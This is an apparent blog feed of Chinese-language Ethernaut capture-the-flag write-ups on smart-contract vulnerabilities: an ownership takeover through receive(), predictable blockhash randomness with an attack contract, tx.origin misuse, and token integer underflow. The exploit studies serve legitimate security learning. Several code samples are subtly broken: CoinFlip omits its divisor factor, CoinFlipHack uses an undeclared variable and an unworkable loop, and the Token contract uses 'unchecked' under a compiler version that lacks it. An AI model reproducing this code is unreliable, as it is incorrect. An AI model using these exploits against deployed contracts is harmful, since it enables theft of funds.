Smart Contracts - Tag - Kyrin Labshttps://www.kyrin.one/tags/smart-contracts/Smart Contracts - Tag - Kyrin LabsHugo -- gohugo.ioen-usSat, 08 Nov 2025 00:00:00 +0000Ethernaut - 01 Fallbackhttps://www.kyrin.one/techshare/writeups/ethernaut/01_fallback/Sat, 08 Nov 2025 00:00:00 +0000Dalekhttps://www.kyrin.one/techshare/writeups/ethernaut/01_fallback/1. 信息:

1.1. 提示信息

进入这一关后,首先可以看到提示:

[!提示]

Look carefully at the contract’s code below.

You will beat this level if

  1. you claim ownership of the contract
  2. you reduce its balance to 0

  Things that might help

  • How to send ether when interacting with an ABI
  • How to send ether outside of the ABI
  • Converting to and from wei/ether units (see help() command)
  • Fallback methods

1.2. 合约代码

直接看合约代码(直接在代码里通过注释的方式,分析代码的功能):

// SPDX-License-Identifier: MIT
// `pragma` specifies the compiler version of Solidity.
pragma solidity ^0.8.0;

contract Fallback {    // 合约名称为:`Fallback`
	// 将地址`address`映射到无符号256位整数`uint256`,这个映射的名字是 `contributions`.
	// 关键字 `public` 表示Solidity会自动为这个映射生成一个gatter函数,使外部和内部一样可以通过调用`contributions(address)`来查询某个地址对应的uint256值
	// 这个 `mapping` 的功能是记录每个地址的贡献值
    mapping(address => uint256) public contributions;

    // 声明一个公开的地址状态变量 `owner`,关键字 `public` 的作用还是生成gatter函数.
    address public owner;

	// 构造函数,部署合约时只执行一次
    constructor() {
		// 让部署者成为owner,`msg.sender` 中存储的是当前函数调用者的地址
        owner = msg.sender;
        // 调用这段代码开头的 `contributions` 函数,owner拥有1000ETH的初始贡献(注意:这里是以wei为单位,所以实际是1000*10^18 wei)
        contributions[msg.sender] = 1000 * (1 ether);
    }

	// 这是一个修饰器
    modifier onlyOwner() {
	    // `require` 是用来条件检查语句,
        require(msg.sender == owner, "caller is not the owner");// 只有拥有者可以调用,否则回滚交易并清空所有Gas
        _;         // 原函数体的插入位置
    }

	// `payable` 函数是可以接收ETH的函数
    function contribute() public payable {
        require(msg.value < 0.001 ether);    // 要求每次贡献的金额小于0.001 ether
        contributions[msg.sender] += msg.value;    // 累加发送者的贡献值
        // 这个 `if` 用来判断如果当前发送者的贡献值超过当前拥有者的贡献值,则更新拥有者为当前发送者
        if (contributions[msg.sender] > contributions[owner]) {
            owner = msg.sender;
        }
    }

	// `view` 函数只读取数据,在链外调用时,不消耗Gas
    function getContribution() public view returns (uint256) {
        //  返回当前发送者的贡献值
        return contributions[msg.sender];
    }

	// `onlyOwner` 修饰器负责权限控制,只用owner可以调用
	// **address(this).balance**:合约当前的ETH余额
	// **payable转换**:将address转换为payable address以接收ETH
	// **transfer函数**:发送ETH到指定地址(2300 Gas限制,自动失败)
    function withdraw() public onlyOwner {
        payable(owner).transfer(address(this).balance);
    }

	//- **receive函数**:专门处理纯ETH转账的特殊函数
	//- **external可见性**:只能从外部调用
	//- **payable**:可以接收ETH
	//- **条件限制**:需要发送ETH且发送者已有贡献记录
	//- **所有权转移**:满足条件时立即成为新owner
    receive() external payable {
        require(msg.value > 0 && contributions[msg.sender] > 0);
        owner = msg.sender;
    }
}

2. 分析

2.1. 合约代码逻辑分析

和合约代码逻辑 && 漏洞利用逻辑 从函数 “contribute()" 可以看出 “owner” 的贡献为 1000 ETH 。有一种变成 “owner” 的方式是贡献大于当前 “owner” 的 1000 ETH。显然不太可能。 那么还有一种方式就是通过 “receive()” 函数,观察代码可知,当贡献已大于0,并且再发送大于0的金额时,就会被设置成 “owner” 。

]]>Ethernaut - 02 FAL1OUThttps://www.kyrin.one/techshare/writeups/ethernaut/02_fal1out/Sat, 08 Nov 2025 00:00:00 +0000Dalekhttps://www.kyrin.one/techshare/writeups/ethernaut/02_fal1out/1. 信息:

1.1. 提示信息

进入这一关后,首先可以看到提示:

[!提示]

Look carefully at the contract’s code below.

]]>Ethernaut - 03 Coin Fliphttps://www.kyrin.one/techshare/writeups/ethernaut/03_coin-flip/Sat, 08 Nov 2025 00:00:00 +0000Dalekhttps://www.kyrin.one/techshare/writeups/ethernaut/03_coin-flip/踩坑记录:区块链上的随机数很难。最初以为用 block.number 就够了,结果看了 Writeup 才知道这是确定性环境。

核心漏洞blockhash() 可被预测

// 有问题的合约代码
contract CoinFlip {
    uint256 public consecutiveWins;
    uint256 lastHash;

    function flip(bool _guess) public returns (bool) {
        uint256 blockValue = uint256(blockhash(block.number - 1));

        if (lastHash == blockValue) {
            revert();
        }

        lastHash = blockValue;
        uint256 coinFlip = blockValue / 2;
        bool side = coinFlip == 1 ? true : false;

        if (side == _guess) {
            consecutiveWins++;
            return true;
        } else {
            consecutiveWins = 0;
            return false;
        }
    }
}

攻击思路(来源:Ethernaut 官方解答): 由于 block.number - 1 的哈希在交易打包时已知,我们可以部署攻击合约提前计算:

// 攻击合约(需部署到相同区块)
contract CoinFlipHack {
    CoinFlip public victim;
    uint256 public consecutiveWins;

    constructor(address _victim) {
        victim = CoinFlip(_victim);
    }

    function attack() public {
        uint256 blockValue = uint256(blockhash(block.number - 1));
        uint256 coinFlip = blockValue / 2;
        bool guess = coinFlip == 1 ? true : false;

        victim.flip(guess);
    }

    // 必须每个区块调用一次,因为 blockhash 只在当前区块有效
    function attackInLoop() public {
        for (uint i = 0; i < 10; i++) {
            // 需要等待新区块
            require(block.number > lastBlock, "Wait for new block");
            attack();
            lastBlock = block.number;
        }
    }
}

成功条件:连续赢 10 次

]]>Ethernaut - 04 Telephonehttps://www.kyrin.one/techshare/writeups/ethernaut/04_telephone/Sat, 08 Nov 2025 00:00:00 +0000Dalekhttps://www.kyrin.one/techshare/writeups/ethernaut/04_telephone/核心漏洞tx.originmsg.sender 的区别

contract Telephone {
    address public owner;

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) { // 这里本意是防止合约调用,但逻辑反了
            owner = _owner;
        }
    }
}

攻击思路(来源:OpenZeppelin 安全博文): tx.origin 是最初发起交易的外部账户(EOA),而 msg.sender 是最近一次调用的地址。

攻击流程

你的 EOA (tx.origin) → 攻击合约 (msg.sender) → Telephone合约

在 Telephone 合约中:

  • tx.origin = 你的 EOA(外部账户)
  • msg.sender = 攻击合约地址

所以 tx.origin != msg.sender 条件为 true,满足 owner 变更条件。

]]>Ethernaut - 05 Tokenhttps://www.kyrin.one/techshare/writeups/ethernaut/05_token/Sat, 08 Nov 2025 00:00:00 +0000Dalekhttps://www.kyrin.one/techshare/writeups/ethernaut/05_token/踩坑记录:版本管理的重要性。

核心漏洞:未检查余额扣减时的整数下溢

// 漏洞合约(版本 ^0.6.0)
contract Token {
    mapping(address => uint) balances;
    uint256 public totalSupply;

    constructor(uint256 _initialSupply) public {
        balances[msg.sender] = totalSupply = _initialSupply;
    }

    function transfer(address _to, uint256 _value) public returns (bool) {
        // 这里使用了 unchecked!
        unchecked {
            balances[msg.sender] -= _value; // 若余额不足,会下溢到 2^256-1
            balances[_to] += _value;
        }
        return true;
    }
}

攻击流程(来源:OpenZeppelin 安全博文): 如果你的余额是 20,你要转账 21:

  • balances[msg.sender] -= 21 → 下溢 → 余额 = 2^256 - 1
  • 瞬间获得无限代币

攻击步骤

  1. 获取初始代币(比如 20 个)
  2. 调用 transfer(受害地址, 21)
  3. 你的余额变为极大值

个人感悟:版本管理!版本管理!版本管理!版本管理!版本管理!版本管理!版本管理!版本管理!

]]>Ethernaut - 00 Hello Ethernauthttps://www.kyrin.one/techshare/writeups/ethernaut/00_hello-ethernaut/Sat, 08 Nov 2025 00:00:00 +0000Dalekhttps://www.kyrin.one/techshare/writeups/ethernaut/00_hello-ethernaut/解题的时候 没有记录。。。。。。。。。

简单写一下流程:

1. 访问网站"https://ethernaut.openzeppelin.com/"

![[Pasted image 20251108102304.png]]

2. 点击"00"的小手图标后进入第一个题目(Hello Ethernaut):

![[Pasted image 20251108102641.png]]

3. 随后按照教学步骤操作即可。

这里记录一下踩到的坑和解题步骤:

1. 坑:水龙头提取不到i测试币

Note

(发现目前几个水龙头都有点问题),要求钱包里至少有0.001ETH或者1Link之类的

![[Pasted image 20251108105610.png]] 目前这几个都没领到测试币:

https://faucets.chain.link/ https://cloud.google.com/application/web3/faucet/ethereum/sepolia

解决方法:

Note

1、给钱包里放超过0.001ETH后,这个网站可以领到币(https://faucet.quicknode.com/ethereum/sepolia)。

2、听说B站有博主,关注之后会定期放水,有空可以了解一下。

![[Pasted image 20251108114327.png]]

解题步骤:

  1. 按照新手指引,创建好钱包、账户并获取了测试币后,打开浏览器控制台
  2. 在控制台输入指令顺序大致如下(): Step_1:(按照提示获得的第一个method,)
await contract.info()
// Output: 'You will find what you need in info1().'

Step_2:(根据info的输出获得第二个method是info1)

]]>